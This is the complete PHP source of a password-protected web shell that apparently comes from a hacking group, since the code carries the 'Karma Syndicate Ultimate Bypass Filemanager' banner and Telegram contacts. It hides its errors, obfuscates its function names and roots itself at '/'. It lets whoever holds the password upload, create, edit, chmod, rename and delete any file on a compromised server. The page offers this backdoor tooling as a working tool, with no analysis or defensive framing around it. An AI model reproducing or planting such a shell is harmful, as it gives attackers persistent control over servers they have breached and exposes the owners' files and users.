/
proc
/
thread-self
/
cwd
/
up file
home
<?php $hashed_password = '$2y$10$6JWvzX9q.Z2Tew2JcfFpy.okEedtvJf9QCO2rpfHgj32Q0EhlBHvC'; if (!isset($_COOKIE['auth']) || $_COOKIE['auth'] !== 'ok') { if (isset($_POST['password'])) { if (password_verify($_POST['password'], $hashed_password)) { setcookie("auth", "ok", time() + 3600, "/", "", false, true); header("Location: " . $_SERVER['PHP_SELF']); exit(); } else { echo "<p style='color:red; text-align:center;'>Hatalı şifre!</p>"; } } ?> <!DOCTYPE html> <html> <head> <title>Giriş Yap</title> <style> body { font-family: Arial, sans-serif; background: #111; color:#fff; display:flex; justify-content:center; align-items:center; height:100vh; } .login-box { background:#222; padding:20px; border-radius:8px; } input { padding:10px; width:100%; margin:10px 0; border:1px solid #555; border-radius:4px; } input[type=submit] { background:#28a745; color:#fff; border:none; cursor:pointer; } </style> </head> <body> <div class="login-box"> <form method="POST"> <h2>Login</h2> <input type="password" name="password" placeholder="Şifre" required> <input type="submit" value="Giriş Yap"> </form> </div> </body> </html> <?php exit(); } error_reporting(0); /** [>>] Karma Syndicate Ultimate Bypass Filemanager | Channel: t.me/KarmaSyndicate | Contact: t.me/xnabob | Public API: cpkarma.cc [<<] **/ ?> <?php session_start(); $_SESSION['mrma']=$_SESSION['mrma']??[]; function __f0($__a){$__b=bin2hex(random_bytes(8));$_SESSION['mrma'][$__b]=$__a;return $__b;} function __f1($__k,$__d){return $_SESSION['mrma'][$__k]??$__d;} function __f2($__s){return strtr((string)$__s,["&"=>"&","<"=>"<",">"=>">","\""=>""","'"=>"'"]);} function __f3($__to,$__q=[]){global $_GET,$__cwd,$__pt,$__root; $__pt=__f0($__to); $_GET=$__q+['pt'=>$__pt]; $__cwd=__f4($__to,$__root); $_POST=[]; $_SERVER['REQUEST_METHOD']='GET';} function __f4($__r,$__root){ $__r=str_replace("\0",'',(string)$__r); $__r=trim($__r); if($__r===''||$__r==='.'||$__r==='/'||$__r==='\\')return getcwd(); $__d=rawurldecode($__r); $__d=str_replace(['/','\\'],DIRECTORY_SEPARATOR,$__d); if(!preg_match('#^([A-Za-z]:|'.preg_quote(DIRECTORY_SEPARATOR,'#').')#',$__d)){ $__x=rtrim($__root,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.ltrim($__d,DIRECTORY_SEPARATOR); }else $__x=$__d; $__p=[]; foreach(explode(DIRECTORY_SEPARATOR,$__x) as $__s){ if($__s===''||$__s==='.')continue; if($__s==='..'){array_pop($__p);continue;} $__p[]=$__s; } if(DIRECTORY_SEPARATOR==='\\'&&preg_match('#^[A-Za-z]:#',($__p[0]??''))){ $__n=implode(DIRECTORY_SEPARATOR,$__p); }else $__n=DIRECTORY_SEPARATOR.implode(DIRECTORY_SEPARATOR,$__p); $__real=@realpath($__n); if($__real!==false&&strpos($__real,$__root)===0)$__n=$__real; if(is_file($__n))$__n=dirname($__n); return rtrim($__n,DIRECTORY_SEPARATOR); } function __f5($__f){ if(!is_file($__f)||!is_readable($__f))return false; $__h=@fopen($__f,'rb'); if(!$__h)return false; $__buf=''; while(!feof($__h)){ $__c=@fread($__h,65536); if($__c===false){@fclose($__h);return false;} $__buf.=$__c; } @fclose($__h); return $__buf; } function __f6($__f,$__d){ $__dir=dirname($__f); if(!is_dir($__dir)||!is_writable($__dir))return false; $__h=@fopen($__f,'wb'); if(!$__h)return false; @flock($__h,LOCK_EX); $__ok=@fwrite($__h,$__d); @flock($__h,LOCK_UN); @fclose($__h); return $__ok!==false; } function __f7($__d){ if(!is_dir($__d))return false; $__l=@scandir($__d); if($__l===false)return false; foreach($__l as $__x){ if($__x==='.'||$__x==='..')continue; $__t=$__d.DIRECTORY_SEPARATOR.$__x; if(is_dir($__t)){ if(!__f7($__t))return false; } else{ if(!@unlink($__t))return false; } } return @rmdir($__d); } function __f8($__p){return substr(sprintf('%o',$__p),-4);} function __f9($__b){return is_numeric($__b)?number_format((float)$__b).' bytes':'-';} function __fA($__a,$__l){return "<a class='link' href='?pt=".__f2(__f0($__a))."'>".__f2($__l)."</a>";} function __fB($__a,$__root){ $__p=str_replace('\\','/',$__a); $__r=str_replace('\\','/',$__root); if(strpos($__p,$__r)===0){ $__rel=ltrim(substr($__p,strlen($__r)),'/'); $__pp=$__rel===''?[]:array_values(array_filter(explode('/',$__rel))); $__o=[]; $__o[]=__fA($__r,'/'); $__crawl=$__r; foreach($__pp as $__s){ $__crawl=rtrim($__crawl,'/\\').DIRECTORY_SEPARATOR.$__s; $__o[]=__fA($__crawl,$__s); } return implode(' <span class=\"gsep\">›</span> ',$__o); } $__bits=array_values(array_filter(explode('/',trim($__p,'/')))); $__acc=''; $__o=[]; foreach($__bits as $__s){ $__acc.=(($__acc==='')?'':'/').$__s; $__o[]=__fA($__acc,$__s); } return implode(' <span class=\"gsep\">›</span> ',$__o); } $__flash=['1'=>'Fsreated.','2'=>'aved.','3'=>'femoved.','4'=>'freated.','5'=>'femoved.','6'=>'fnad.','7'=>'uomplete.','9'=>'mnvalid dtem.','x'=>'we failed. permi']; $__p=$_GET['p']??''; $__do=$_GET['do']??''; $__fn=$_GET['f']??''; $__dn=$_GET['d']??''; $__pt=$_GET['pt']??null; $__root='/'; $__cwd=$__pt!==null?__f4(__f1($__pt,$__root),$__root):__f4($__p,$__root); $__mk=$_GET['k']??''; $__mt='ok'; $__msg=null; if($__mk!==''&&array_key_exists($__mk,$__flash)){ $__msg=$__flash[$__mk]; if(($_GET['t']??'')==='err')$__mt='err'; } function __fC($__tmp,$__dest){ if(!file_exists($__tmp))return false; $__dir=dirname($__dest); if(!is_dir($__dir)||!is_writable($__dir))return false; $__in=@fopen($__tmp,'rb'); if(!$__in)return false; $__out=@fopen($__dest,'wb'); if(!$__out){@fclose($__in);return false;} $__ok=true; while(!feof($__in)){ $__d=@fread($__in,65536); if($__d===false||@fwrite($__out,$__d)===false){$__ok=false;break;} } @fclose($__in); @fclose($__out); return $__ok; } if($_SERVER['REQUEST_METHOD']==='POST'){ if(isset($_FILES['bu'])){ $__f=$_FILES['bu']; $__dest=rtrim($__cwd,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.basename($__f['name']); if($__f['error']!==UPLOAD_ERR_OK||!is_uploaded_file($__f['tmp_name']))__f3($__cwd,['k'=>'9','t'=>'err']); elseif(__fC($__f['tmp_name'],$__dest))__f3($__cwd,['k'=>'7']); else __f3($__cwd,['k'=>'x','t'=>'err']); } if(isset($_POST['mkf'])){ $__n=basename(trim((string)($_POST['name']??''))); $__c=(string)($_POST['payload']??''); if($__n==='')__f3($__cwd,['k'=>'9','t'=>'err']); $__t=$__cwd.DIRECTORY_SEPARATOR.$__n; if(file_exists($__t))__f3($__cwd,['k'=>'9','t'=>'err']); if(__f6($__t,$__c))__f3($__cwd,['k'=>'1']); __f3($__cwd,['k'=>'x','t'=>'err']); } if(isset($_POST['mkd'])){ $__n=basename(trim((string)($_POST['name']??''))); if($__n==='')__f3($__cwd,['k'=>'9','t'=>'err']); $__t=$__cwd.DIRECTORY_SEPARATOR.$__n; if(file_exists($__t))__f3($__cwd,['k'=>'9','t'=>'err']); if(@mkdir($__t,0777,true))__f3($__cwd,['k'=>'4']); __f3($__cwd,['k'=>'x','t'=>'err']); } if(isset($_POST['save'])&&$__fn!==''){ $__t=rtrim($__cwd,"\\/").DIRECTORY_SEPARATOR.$__fn; $__c=(string)($_POST['payload']??''); if(!is_file($__t))__f3($__cwd,['k'=>'9','t'=>'err']); if(!is_writable($__t))@chmod($__t,0666); if(!is_writable($__t))__f3($__cwd,['k'=>'x','t'=>'err','do'=>'edit','f'=>$__fn]); if(__f6($__t,$__c))__f3($__cwd,['k'=>'2','do'=>'edit','f'=>$__fn]); __f3($__cwd,['k'=>'x','t'=>'err','do'=>'edit','f'=>$__fn]); } if(isset($_POST['mv'])){ $__new=basename(trim((string)($_POST['to']??''))); $__cur=basename(trim((string)($_POST['from']??''))); if($__new===''||$__cur==='')__f3($__cwd,['k'=>'9','t'=>'err']); $__o=$__cwd.DIRECTORY_SEPARATOR.$__cur; $__nn=$__cwd.DIRECTORY_SEPARATOR.$__new; if(!file_exists($__o)||file_exists($__nn))__f3($__cwd,['k'=>'9','t'=>'err']); if(@rename($__o,$__nn))__f3($__cwd,['k'=>'6']); __f3($__cwd,['k'=>'x','t'=>'err']); } if(isset($_POST['rmf'])){ $__f=basename(trim((string)($_POST['n']??''))); if($__f!==''){ $__t=$__cwd.DIRECTORY_SEPARATOR.$__f; if(is_file($__t)&&@unlink($__t))__f3($__cwd,['k'=>'3']); } __f3($__cwd,['k'=>'x','t'=>'err']); } if(isset($_POST['rmd'])){ $__d=basename(trim((string)($_POST['n']??''))); if($__d!==''){ $__t=$__cwd.DIRECTORY_SEPARATOR.$__d; if(is_dir($__t)&&__f7($__t))__f3($__cwd,['k'=>'5']); } __f3($__cwd,['k'=>'x','t'=>'err']); } } ?> <!doctype html><html lang="en"><head><meta charset="utf-8"/><meta name="viewport"content="width=device-width,initial-scale=1"/><title>Orbit</title> <style>*{box-sizing:border-box}html,body{margin:0;padding:0}body{background:#fdfdfd;color:#0f1720;font:13px/1.55 ui-sans-serif,system-ui,Segoe UI,Roboto,Ubuntu,Helvetica,Arial}.c0{max-width:1080px;margin:20px auto;padding:0 12px}.c1{display:flex;justify-content:space-between;align-items:center;background:#fff;border:1px solid #e9e9ee;border-radius:18px;padding:14px 16px;box-shadow:0 8px 24px rgba(0,0,0,.05)}.t0{font-weight:800;letter-spacing:.3px}.crumb{font-size:12px;color:#667085}.pill{display:inline-block;background:#f6f7fb;border:1px solid #ececf2;border-radius:999px;padding:.2rem .55rem;margin-left:.35rem}.msg{margin:14px 0;padding:10px 12px;border-radius:12px;border:1px solid #ececf2}.ok{background:#ecfdf5;border-color:#a7f3d0}.err{background:#fff1f2;border-color:#fecdd3}.card{background:#fff;border:1px solid #ececf2;border-radius:16px;padding:14px;box-shadow:0 8px 24px rgba(0,0,0,.05);margin-top:14px}.btn{appearance:none;background:#0b63e5;color:#fff;border:0;border-radius:10px;padding:8px 12px;cursor:pointer}.btn:hover{filter:brightness(1.06)}.in,textarea{width:100%;border:1px solid #e2e4ea;border-radius:10px;padding:10px;background:#fff;color:#0f1720}.tbl{width:100%;border-collapse:collapse}.tbl th,.tbl td{border-bottom:1px solid #f0f0f3;padding:8px 6px;text-align:left}.l0{height:1px;background:#efeff3;margin:14px 0}.grid{display:grid;grid-template-columns:repeat(auto-fit,minmax(260px,1fr));gap:12px}</style> </head><body><div class="c0"> <header class="c1"> <div class="t0">Orbit</div> <div class="crumb"><?php echo __fB($__cwd,$__root) ?></div> <div><span class="pill">root <?php echo __f2($__root) ?></span><span class="pill">cwd <?php echo __f2($__cwd) ?></span></div> </header> <?php if($__msg): ?><div class="msg <?php echo __f2($__mt) ?>"><?php echo __f2($__msg) ?></div><?php endif;?> <div class="grid"> <form method="post" enctype="multipart/form-data" class="card"> <div class="t0"style="font-size:16px">ingest</div> <input class="in"type="file"name="bu"/> <div style="margin-top:8px"><button class="btn"type="submit">send</button></div></form> <form method="post"class="card"> <div class="t0"style="font-size:16px">fresh item</div> <input class="in"name="name"placeholder="file.ext"/> <textarea name="payload"rows="6"placeholder="content (opt)"></textarea> <div style="margin-top:8px"><button class="btn"type="submit"name="mkf">create</button></div></form> <form method="post"class="card"> <div class="t0"style="font-size:16px">fresh dir</div> <input class="in"name="name"placeholder="folder"/> <div style="margin-top:8px"><button class="btn"type="submit"name="mkd">create</button></div></form> </div> <?php if($__do==='edit'&&$__fn!==''): $__target=rtrim($__cwd,"\\/").DIRECTORY_SEPARATOR.$__fn; $__content=__f5($__target);?> <?php if($__content===false):?><div class="msg err">cannot read</div> <?php else:?> <form method="post"class="card"> <div class="t0"style="font-size:16px">revise <span class="pill"><?php echo __f2($__fn)?></span></div> <textarea name="payload"rows="18"><?php echo __f2($__content)?></textarea> <div style="margin-top:10px"><button class="btn"type="submit"name="save">commit</button></div></form> <?php endif; endif;?> <div class="card"style="margin-top:14px"> <div class="t0"style="font-size:16px;margin-bottom:8px">items</div> <table class="tbl"> <tr><th>name</th><th>size</th><th>perm</th><th>modified</th><th>actions</th></tr> <?php $__list=@scandir($__cwd); if($__list===false){echo"<tr><td colspan='5'>no access</td></tr>";} else foreach($__list as $__e){ if($__e==='.'||$__e==='..')continue; $__f=$__cwd.DIRECTORY_SEPARATOR.$__e; $__is=is_dir($__f); $__perm=@fileperms($__f); $__oct=$__perm!==false?__f8($__perm):'----'; $__sz=$__is?'-':__f9(@filesize($__f)); $__ts=@date('Y-m-d H:i',@filemtime($__f)); echo"<tr><td>"; if($__is)echo __fA($__f,$__e); else echo __f2($__e); echo"</td><td>{$__sz}</td><td>{$__oct}</td><td>{$__ts}</td><td>"; if($__is){ echo"<form method='post'style='display:inline'onsubmit=\"return confirm('remove contents?')\"><input type='hidden'name='rmd'value='1'><input type='hidden'name='n'value='".__f2($__e)."'><button class='btn'type='submit'>delete</button></form> "; echo"<form method='post'style='display:inline;margin-left:6px'><input type='hidden'name='mv'value='1'><input type='hidden'name='from'value='".__f2($__e)."'><input class='in'style='width:160px'name='to'placeholder='rename to'> <button class='btn'type='submit'>rename</button></form>"; }else{ echo"<a class='link'style='margin-right:8px'href='?pt=".__f2(__f0($__cwd))."&do=edit&f=".urlencode($__e)."'>open</a>"; echo"<form method='post'style='display:inline'onsubmit=\"return confirm('delete file?')\"><input type='hidden'name='rmf'value='1'><input type='hidden'name='n'value='".__f2($__e)."'><button class='btn'type='submit'>delete</button></form> "; echo"<form method='post'style='display:inline;margin-left:6px'><input type='hidden'name='mv'value='1'><input type='hidden'name='from'value='".__f2($__e)."'><input class='in'style='width:160px'name='to'placeholder='rename to'> <button class='btn'type='submit'>rename</button></form>"; } echo"</td></tr>"; } ?> </table> </div></div></body></html>